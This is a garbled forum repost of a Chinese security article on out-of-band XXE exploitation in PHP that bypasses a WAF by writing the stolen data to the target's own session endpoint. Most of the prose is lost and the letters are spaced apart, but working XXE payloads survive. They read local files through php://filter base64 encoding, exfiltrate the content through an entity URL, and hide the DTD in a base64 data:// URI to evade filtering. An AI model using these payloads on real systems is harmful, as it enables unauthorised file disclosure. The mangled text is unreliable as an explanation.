[14555] 2019-09-06_绕过WAF限制利用php方法实现OOB-XXE漏洞利用

文档创建者:s7ckTeam
浏览次数:11
最后更新:2025-01-18
2019-09-06_绕过WAF限制利用php方法实现OOB-XXE漏洞利用 W A F p h p : O O B - X X E c l o u d s   F r e e B u f   2 0 1 9 - 0 9 - 0 6 O O B - X X E W A F D N S O u t g o i n g   R e q u e s t p h p : / / f i l t e r / / O O B - X X E x m l X M L x m l X M L H T T P X M L X M L 便 X X E   P a y l o a d X M L J a v a S c r i p t J a v a S c r i p t W e b P a c k J a v a S c r i p t C h r o m e X M L J a v a S c r i p t e x t e r n a l   e n t i t y X M L X M L   P a y l o a d E r r o r   w h i l e   p a r s i n g   X M L e x t e r n a l   e n t i t y     W A F D N S X X E X X E W A F W A F c o o k i e 使 G E T c o o k i e I D h t t p : / / t a r g e t / e n d p o i n t . p h p ? s i d = [ s e s s i o n _ i d ] & k e y = x x e & v a l = t e s t s i d k e y v a l k e y v a l I D 访 h t t p : / / t a r g e t / e n d p o i n t . p h p ? s i d = [ s e s s i o n _ i d ] & k e y = x x e & v a l = t e s t G E T x x e t e s t X X E   P a y l o a d   h t t p : / / t a r g e t / e n d p o i n t . p h p ? s i d = [ s e s s i o n _ i d ]   s i d G E T X X E D T D W A F D T D D T D P H P p h p : / /   d a t a : / /   U R I D T D b a s e 6 4 p h p : / / X M L [ h t t p : / / l o c a l h o s t / ] ( h t t p : / / l o c a l h o s t / ) : < ! D O C T Y P E   f o o   [                   < ! E L E M E N T   f o o   A N Y   >               < ! E N T I T Y   x x e   S Y S T E M   " h t t p : / / t a r g e t / e n d p o i n t . p h p ? s i d = [ s e s s i o n _ i d ] & k e y = x x e & v a l = t e s t " >         ] >         < p a r a m l i m i t s >             < c o m p o n e n t   n a m e = " L 1 "   m i n = " 2 "   m a x = " 1 0 0 " > & x x e ; < / c o m p o n e n t >         < / p a r a m l i m i t s > < ! E N T I T Y   %   d a t a   S Y S T E M   " p h p : / / f i l t e r / c o n v e r t . b a s e 6 4 - e n c o d e / r e s o u r c e = f i l e : / / / D : / p a t h / i n d e x . p h p " >         < ! E N T I T Y   %   p a r a m 1   ' < ! E N T I T Y   e x f i l   S Y S T E M   " h t t p : / / t a r g e t / e n d p o i n t . p h p ? s i d = [ s e s s i o n _ i d ] & # 3 8 ; k e y = x x e & # 3 8 ; v a l = % d a t a ; " > ' > p h p : / / f i l t e r / / r e s o u r c e = d a t a : / / t e x t / p l a i n ; b a s e 6 4 , P C F F T l R J V F k g J S B k Y X R h I F N Z U 1 R F T S A i c G h w O i 8 v Z m l s d G V y L 2 N v b n Z l c n Q u Y m F z Z T Y 0 L W V u Y 2 9 k Z S 9 y Z X N v d X J j Z T 1 m a W x l O i 8 v L 0 Q 6 L 3 B h d G g v a W 5 k Z X g u c G h w I j 4 N C j w h R U 5 U S V R Z I C U g c G F y Y W 0 x I C c 8 I U V O V E l U W S B l e G Z p b C B T W V N U R U 0 g I m h 0 d H A 6 L y 9 0 Y X J n Z X Q v Z W 5 k c G 9 p b n Q u c G h w P 3 N p Z D 1 b c 2 V z c 2 l v b l 9 p Z F 0 m I z M 4 O 2 t l e T 1 4 e G U m I z M 4 O 3 Z h b D 0 l Z G F 0 Y T s i P i c + p h p : / / f i l t e r / c o n v e r t . b a s e 6 4 - e n c o d e / r e s o u r c e = f i l e : / / / D : / p a t h / i n d e x . p h p                                 h t t p : / / t a r g e t / e n d p o i n t . p h p ? s i d = [ s e s s i o n _ i d ] & # 3 8 ; k e y = x x e & # 3 8 ; v a l = % d a t a ;
c o n v e r t . b a s e 6 4 - e n c o d e   i n d e x . p h p   便 X X E   P a y l o a d h t t p : / / t a r g e t / e n d p o i n t . p h p ? s i d = [ s e s s i o n _ i d ] b a s e 6 4 i n d e x . p h p * m a h m o u d s e c c l o u d s F r e e B u f . C O M < ! D O C T Y P E   r   [             < ! E L E M E N T   r   A N Y   >             < ! E N T I T Y   %   s p   S Y S T E M   " p h p : / / f i l t e r / / r e s o u r c e = d a t a : / / t e x t / p l a i n ; b a s e 6 4 , P C F F T l R J V F k g J S B k Y X R h I F N Z U 1 R F T S A i c G h w O i 8 v Z m l s d G V y L 2 N v b n Z l c n Q u Y m F z Z T Y 0 L W V u Y 2 9 k Z S 9 y Z X N v d X J j Z T 1 m a W x l O i 8 v L 0 Q 6 L 3 B h d G g v a W 5 k Z X g u c G h w I j 4 N C j w h R U 5 U S V R Z I C U g c G F y Y W 0 x I C c 8 I U V O V E l U W S B l e G Z p b C B T W V N U R U 0 g I m h 0 d H A 6 L y 9 0 Y X J n Z X Q v Z W 5 k c G 9 p b n Q u c G h w P 3 N p Z D 1 b c 2 V z c 2 l v b l 9 p Z F 0 m I z M 4 O 2 t l e T 1 4 e G U m I z M 4 O 3 Z h b D 0 l Z G F 0 Y T s i P i c + " >   % s p ;   % p a r a m 1 ;         ] >         < p a r a m l i m i t s >             < c o m p o n e n t   n a m e = " L 1 "   m i n = " 2 "   m a x = " 1 0 0 " > & e x f i l ; < / c o m p o n e n t >         < / p a r a m l i m i t s >

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则